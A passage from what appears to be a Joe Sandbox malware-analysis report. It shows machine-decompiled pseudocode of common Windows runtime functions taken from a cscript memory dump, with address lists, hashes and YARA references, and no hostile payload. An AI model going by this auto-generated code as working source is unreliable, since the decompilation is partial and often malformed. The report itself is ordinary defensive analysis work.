					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E054FF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E054EA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x054f90af
0x054f90b8
0x054f90bb
0x054f90bf
0x054f90c2
0x054f90c2
0x054f90c8
0x054f90cb
0x054f90cd
0x055314d7
0x055314eb
0x055314eb
0x00000000
0x055314eb
0x055314db
0x055314e6
0x00000000
0x055314f2
0x055314e8
0x00000000
0x055314e8
0x054f90d8
0x054f90da
0x054f90dd
0x054f90e5
0x00000000
0x054f9139
0x054f90fa
0x054f90fe
0x054f9142
0x00000000
0x054f9142
0x054f9104
0x054f9107
0x054f910b
0x054f9110
0x054f9118
0x054f9147
0x054f9148
0x054f914f
0x054f9150
0x054f9151
0x054f9152
0x054f9156
0x054f915d
0x054f9160
0x054f9168
0x054f916c
0x054f91bc
0x054f91be
0x00000000
0x054f91be
0x054f916e
0x054f9173
0x054f9176
0x00000000
0x00000000
0x054f917c
0x054f9180
0x054f91b5
0x00000000
0x054f91b5
0x054f9182
0x054f9185
0x054f9189
0x00000000
0x00000000
0x054f918e
0x054f9190
0x054f9198
0x00000000
0x00000000
0x054f91a0
0x00000000
0x054f91ad
0x054f91ad
0x054f91b0
0x054f91b1
0x00000000
0x054f9185
0x054f911a
0x054f911c
0x054f911f
0x054f9125
0x054f9127
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: ff8215611c899f3a28c48d7a4f1610554f9824637a3768c55331101e51e5db7f
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 04217C71A00204EFEB20DF59C944EAAF7F8FB44350F14887BEA89A7210D370A905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 054E3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E054E3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x55a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x55a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x55a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E054FAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E054FFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x55a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x55a84c4; // 0x0
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x054e3b89
0x054e3b96
0x054e3ba1
0x054e3bab
0x054e3bb5
0x054e3bb9
0x05526298
0x054e3bbf
0x054e3bc2
0x054e3bc3
0x054e3bc9
0x054e3bca
0x054e3bcc
0x054e3bcd
0x054e3bd4
0x054e3bd6
0x054e3bdb
0x054e3bea
0x054e3bf7
0x054e3bfb
0x054e3bff
0x054e3c09
0x054e3c0a
0x054e3c0b
0x054e3c0f
0x054e3c14
0x054e3c18
0x054e3c18
0x054e3bfb
0x054e3c1b
0x054e3c30
0x054e3c30
0x054e3c3d

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bc7c79457099d303d0206c5760bd088a33912497da9f776d432fd436097622
Instruction ID: 57dab609d0c86dba65268ef77a644de784ec50d13fed61612449e8c679f6db64
Opcode Fuzzy Hash: 51bc7c79457099d303d0206c5760bd088a33912497da9f776d432fd436097622
Instruction Fuzzy Hash: 6921A4B2A00104AFC701DF98CD81FAABBBDFB44708F25056AF609AB251D771ED15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05536CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05536CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E054D7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E054D7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5495c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E054EF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E054EF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05537016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L054D2400( &_v52);
								}
								_t21 = L054D2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x05536cfb
0x05536d00
0x05536d02
0x05536d06
0x05536d0a
0x05536d0e
0x05536d19
0x05536d2b
0x05536d1b
0x05536d24
0x05536d24
0x05536d33
0x05536d39
0x05536d46
0x05536d4f
0x05536d61
0x05536d51
0x05536d5a
0x05536d5a
0x05536d69
0x05536d6b
0x05536d6d
0x05536d6f
0x05536d6f
0x05536d74
0x05536d79
0x05536d7a
0x05536d7f
0x05536d82
0x05536d88
0x05536d89
0x05536d90
0x05536d94
0x05536da7
0x05536db1
0x05536db1
0x05536dbb
0x05536dbb
0x05536d90
0x05536d69
0x05536d46
0x05536dc6

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b7a788b281172a2d57be31cc157b835ee67a6486c1fbd6b98bd5fcfed49888
Instruction ID: 1c6053a5b624c76ff36d6970db5e97e5cb2fac09f8b4abebef567fdd880f8b9c
Opcode Fuzzy Hash: 55b7a788b281172a2d57be31cc157b835ee67a6486c1fbd6b98bd5fcfed49888
Instruction Fuzzy Hash: 0021F272608244ABC711DF29C949BABB7ECFF81640F04085EF984C7251E734DA09C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0558070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0558070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E055807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0557AFDE( &_v8,  &_v12);
					E05581293(_t38, _v28, _t60);
					if(E054D7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E055714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0558071b
0x05580724
0x05580734
0x05580738
0x0558074b
0x0558074b
0x05580753
0x05580753
0x05580759
0x0558075d
0x05580774
0x05580779
0x0558077d
0x05580789
0x05580795
0x055807a7
0x05580797
0x055807a0
0x055807a0
0x055807af
0x055807c4
0x055807cd
0x055807cd
0x055807af
0x055807dc

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: d80c757d1f3bc3abf62be4bcf8240b9ca1eebe9733b5a023651cfafa257c0cdf
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: F02122363086049FC705EF28C888B7ABBA6FBC0310F048529F8959B395C630D90ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 05537794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E05537794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x55a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E054FF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E054D7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E054F9AE0();
					_t24 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x05537799
0x0553779a
0x0553779b
0x055377a3
0x055377ab
0x055377ae
0x055377b1
0x055377b1
0x055377bf
0x055377c4
0x055377c8
0x055377ce
0x055377d4
0x055377e0
0x055377e0
0x055377d6
0x055377d6
0x055377de
0x00000000
0x00000000
0x055377de
0x055377e5
0x055377f0
0x055377f3
0x055377f6
0x055377fd
0x05537800
0x0553780c
0x05537818
0x0553782b
0x0553781a
0x05537823
0x05537823
0x05537830
0x05537831
0x05537838
0x0553783d
0x0553783e
0x0553784f
0x0553784f
0x0553785a

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a73d6dbf451bbce0340645b33b9136a7ed682b9c8ddbb4c6d3e6759ef3b9f60
Instruction ID: b8e6d05822d7e4926b942732970c03e4d5194dbb54ed0d8e899afa833706d03a
Opcode Fuzzy Hash: 5a73d6dbf451bbce0340645b33b9136a7ed682b9c8ddbb4c6d3e6759ef3b9f60
Instruction Fuzzy Hash: 2621A472A10604ABC725DF69D894EA7BBA9FF4C340F10056EF50AC7750D634EA00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 054DAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E054DAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E054D7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E054D7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E054D7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E054D7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05537794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x054dae78
0x054dae7c
0x054dae7e
0x054dae81
0x054dae86
0x054dae8d
0x05522691
0x054dae93
0x054dae93
0x054dae93
0x054dae98
0x054dae9d
0x055226a2
0x055226b4
0x055226a4
0x055226ad
0x055226ad
0x055226b9
0x00000000
0x055226bb
0x00000000
0x055226bb
0x054daea3
0x054daea3
0x054daea3
0x054daeaa
0x055226c0
0x055226c9
0x055226c9
0x054daeb3
0x055226d4
0x055226e1
0x00000000
0x00000000
0x055226e7
0x055226ee
0x055226f0
0x055226f9
0x055226f9
0x05522702
0x05522708
0x05522708
0x0552270b
0x0552270f
0x05522711
0x05522711
0x05522725
0x05522725
0x00000000
0x054daeb9
0x054daeb9
0x054daebf
0x054daebf
0x054daeb3

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: dc68a30c82c1dcf77e4d476379576365440e6599522051d51334bd5cc642f76d
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: D821263A6056918FD715DB2AC958B75B7EAFF46340F0900A1DC058B792DB34EC41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 054EFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E054EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E054C76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x054efd9b
0x054efda0
0x054efda1
0x054efdab
0x054efdad
0x054efdb0
0x054efdb8
0x054efe0f
0x054efde6
0x054efde9
0x054efdec
0x0552c0c0
0x054efdfe
0x054efe06
0x054efe06
0x0552c0c8
0x054efe2d
0x054efe2d
0x00000000
0x054efe2d
0x0552c0d1
0x0552c0e0
0x0552c0e5
0x0552c0e5
0x0552c0e8
0x00000000
0x0552c0e8
0x054efdf4
0x00000000
0x00000000
0x054efdf6
0x054efdfa
0x054efe1a
0x054efe1f
0x054efe1f
0x054efdfc
0x00000000
0x054efdfc
0x054efdcc
0x054efdd0
0x054efe26
0x00000000
0x054efe26
0x054efdd8
0x054efddb
0x054efddd
0x054efde0
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 5d650d21193d0f95559eae234d6e5f7a3bf96d04a2d54c9487e349a8dee7c748
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: DF217C72604640EBD731CF4AC540EA6FBE6FB94B11F2485AFE94687B11D730AC05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 054EB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E054EB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E054D2280(_t12, 0x55a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E054F00C2(0x55a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x054eb395
0x054eb3a2
0x054eb3a5
0x054eb3aa
0x054eb3b2
0x054eb3ba
0x054eb3bd
0x054eb3c0
0x054eb3c4
0x054eb3c9
0x0552a3e9
0x0552a3ed
0x0552a3f0
0x0552a3ff
0x0552a403
0x0552a409
0x00000000
0x00000000
0x0552a40b
0x0552a40b
0x0552a40f
0x0552a415
0x0552a423
0x0552a423
0x0552a415
0x054eb3d1
0x054eb3e8
0x054eb3e8
0x054eb3d9

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a62b3f7a92d0d1f5dcbf60d00650795132be8cfabaf2c6c6dd87e5388d25485
Instruction ID: 7202cceafe7ac8f0054d3dcffc78b1eb9931fb8112c494137d1d46e89d56c48c
Opcode Fuzzy Hash: 0a62b3f7a92d0d1f5dcbf60d00650795132be8cfabaf2c6c6dd87e5388d25485
Instruction Fuzzy Hash: DB1148377051209BCB19CA158E81AABB2A7FBD5330B28416ED916C7780DD31AC12C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 054B9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E054B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x558f708);
				E0550D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E054F95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E054F95D0();
				_t33 =  *0x55a84c4; // 0x0
				L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x55a84c4; // 0x0
				L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x55a84c4; // 0x0
				E054D2280(L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x55a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E054F95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E054F95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E054B9325();
					_t50 =  *0x55a84c4; // 0x0
					return E0550D0D1(L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x054b9240
0x054b9242
0x054b9247
0x054b924c
0x054b924e
0x054b9255
0x054b9257
0x054b925a
0x054b925f
0x054b925f
0x054b9266
0x054b9271
0x054b9276
0x054b9279
0x054b927e
0x054b9295
0x054b929a
0x054b92b1
0x054b92b6
0x054b92d7
0x054b92dc
0x054b92e0
0x054b92e6
0x054b92e8
0x054b92ee
0x054b9332
0x054b9333
0x054b9337
0x054b9338
0x054b933a
0x054b933a
0x054b933d
0x054b9342
0x054b9342
0x054b9345
0x054b9349
0x054b934e
0x054b9352
0x054b9357
0x054b92f4
0x054b92f4
0x054b92f6
0x054b92f9
0x054b9300
0x054b9306
0x054b9324
0x054b9324

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1742bd45d91071764a6d563f670473346e3a81950647be1646c0fa09ab417e3e
Instruction ID: b534bb94e786c73aebcc8216b97f63962665173145c76a013c725b1d8361c99a
Opcode Fuzzy Hash: 1742bd45d91071764a6d563f670473346e3a81950647be1646c0fa09ab417e3e
Instruction Fuzzy Hash: 1621BE72250A00DFC721EF29CA14F9AB7F9FF08704F04456EE109876A1CB74E941DB60

Uniqueness

Uniqueness Score: -1.00%

Function 05544257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E05544257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x55908d0);
				E0550D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E055441E8(__ebx, __edi, __ecx, _t39);
				E054CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
